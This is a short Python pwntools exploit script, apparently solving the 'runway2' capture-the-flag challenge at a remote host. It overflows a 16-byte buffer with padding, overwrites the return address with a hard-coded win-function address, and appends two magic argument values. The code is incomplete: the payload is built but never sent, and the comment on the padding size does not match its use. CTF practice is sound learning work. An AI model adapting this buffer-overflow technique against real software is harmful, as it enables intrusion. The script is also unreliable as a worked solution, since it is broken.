from pwn import *
# Start the process
# p = process('./runway2') # Replace with the name of your compiled C binary
p = remote('challs.pwnoh.io', 13402)
# Calculate the address of the win function
win_address = p32(0x08049206) # Change this to the correct address of the win function
# Define the values for check and mate
check_value = 0xc0ffee
mate_value = 0x007ab1e
# Create the payload
buffer_size = 16 # Size of the answer buffer
padding_size = buffer_size + 12 # 4 bytes for the return address + 4 bytes for check + 4 bytes for mate
# Create padding with 'A's to overflow the buffer
padding = b'A' * padding_size # Padding to fill the buffer
# Construct the payload
payload = padding + win_address + b'a'*4 + p32(check_value) + p32(mate_value) # Final payload
# Send the payload
# Drop to an interactive shell if the exploit was successful
# print(p.recv())